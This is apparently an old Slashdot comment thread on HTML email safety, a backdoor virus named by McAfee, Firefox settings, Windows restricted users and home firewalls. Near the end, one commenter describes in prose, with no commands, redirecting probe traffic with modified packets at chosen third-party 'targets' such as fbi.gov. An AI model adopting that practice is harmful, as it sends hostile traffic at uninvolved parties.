Disabling HTML mail is not an option for some people, so a compromise would be something like what Mac's Mail offers, which allows you to disable images in HTML messages. But, the nice part is that each message has a "Load Images" button - allowing you to load images on an individual basis, after you've glanced at the text and determined it isn't hostile mail.

It is a virus, and it was known already....

[thrill12]

It's the Backdoor-CAY virus, as named by McAfee. See this article for a description by the person who originally found the virus.
Sending the file to McAfee really helped :)

FireFox Feedback

[twentycavities]

>stop what you're doing right now. Go download Firefox...

I am not the parent poster, but I took your FF advice. Here is my critique (after 10 mins. of use):

• Good
• Looks nice! Not hideous like every other Mozilla I've used.
• Good default toolbar setup. Very similar to my IE settings.
• Tabbed browsing.
• Options are more user friendly.
• Bookmark manager

• Bad
• Doesn't run PopUpCop (IE plugin). I use PopUpCop to turn off/on GIF animation and Flash auto-start.
• Smooth scrolling off by default.
• Smooth scrolling slow.
• The page I'm looking at right now (/. posting thing) looks a little off.

The first thing on my "bad" list may be a deal-breaker, as I can't stand animations next to the text I'm trying to read. Anyway, nice to see Mozilla is finally, genuinely nice. Thanks for the tip.

(Note: Typos/incoherency <- Tylenol)

Re:FireFox Feedback

[danielsfca2]

Thanks for trying out Firefox!

A tip that may prove helpful:
Try using a UserContent.css file to block ads in any CSS-compliant browser. (i.e. any modern browser except IE). I know that this doesn't work for all ads, but it works for many. Also, a personal proxy, I hear, does an excellent job of blocking ads, which I think you'd agree are the majority of the annoying animated things. Hopefully more complete ad-blocking will come to Firefox soon. I'm pretty sure Mozilla proper does have more ad-blocking already implemented, so we'll see.

Re:FireFox Feedback

[Cecil]

Ok, I tried to post this earlier, but Slashdot was doing it's random 503 error.

Doesn't run PopUpCop (IE plugin). I use PopUpCop to turn off/on GIF animation and Flash auto-start.

To turn off looping animations:

Type about:config into the URL bar, double click on image.animation_mode (a search for 'anim' should return only that property) and set the value to one of the following:

• none -- images will not animate, at all, ever.
• once -- images will animate once, then stop on the last frame
• normal -- the default, images animate and loop as requested by the webpage

Irritating flash ads are handled by the famous Flash Click-To-View plugin.

Enjoy using Firefox, or whatever Mozilla flavour you end up settling on.

Put your money where your AutoCAD is.

[gfecyk]

> There are lots of things in windows that
> require admin access, MS office 97 requires it

KB 257643 and others like it cover Office 97 under Win2K and XP as restricted users - edits to security take care of those. Those are bugs in Office 97 apps, plain and simple. But then again, Office 97 isn't supported anymore.

Sure, one Office 2000 applet (Photo Editor) requires a similar hack. It only needs doing once, and then Sysprep and Ghost are your friends in the enterprise.

> AutoCAD does as well

And Autodesk doesn't have a fix by this time? Like I explained: How long has it been? Four years at least? No Excuse. Autodesk has competitors.

Someone asked me to make AutoCAD (whatever version it was) work as a restricted user. I charge C$30.00/hour for this work - take me up on it as you likely won't find cheaper. And if you want, I'll publish your paid work here.

I don't see what all the fuss is about...

[ShadowSystems]

I use Outlook Express 6 & MailWasher.
Between the two, I don't download any piece of mail I don't want, don't view any HTML unless I choose to, and have *never* gotten a virii through my mail.

Express allows you to read all email as text only (Tools|Options|Read [X]Read All Message In Plain Text), and I've got that set as a button on the menu bar so I can toggle between the two states with but a single mouse click.

No images, no scripts, no buffer over-flows, no virii, no problem.

Re:I am a windows user

[gwayne]

Think server environment, not desktop. IIS is required for one thing or another on just about every Win2K server in our domain. I've never used Norton firewall, and I hate patches that require reboots. Only the kernel requires that in Linux. And don't you love the way that Windows IP filtering is an all or nothing affair? Last time I checked, you couldn't specify individual interfaces.

Re:I am a windows user

[Tarwn]

Ok, I see where your coming from. Technically my home machines could be considered servers, but not by the same classification I think your aiming for.

I agree that software updates shouldn't necessitate reboots, and thats one of the few things I dislike about Norton products (and the bastard format they use for log files) even if it is only once every 6 months to a year.

I guess I took the easy way out on filtering. I use Norton to do incoming and outgoing filtering on my main windows box (2kserver) and ipchains on my linux box, then top that all off with very wierd rules in my switch. I used to not bother putting firewalls or filtering on my other machines (laptops etc) until I noticed recently that somehow I am getting people probing ports on them, despite the fact that the switch doesn't relay any traffic to anything higher than x.x.x.3 on my network...ah well.

The best trick I have is just redirecting traffic from the switch instead of one of my machines. I just forward a bunch of offensive ports to one address on my windows machine, which then turns around and sends a slightly modified version of the packet out to whatever ip address resolves from this weeks target (fbi.gov, rr.com, whoever I feel should get off their butts and make someone stop trying to hit my machines). If nothing else maybe I'll scare off a few script kiddies who see traffic going out to one address and coming back from somewhere completely differant :)

important stuff

Art and beauty is defined by the eye of the beholder.

The brown eye?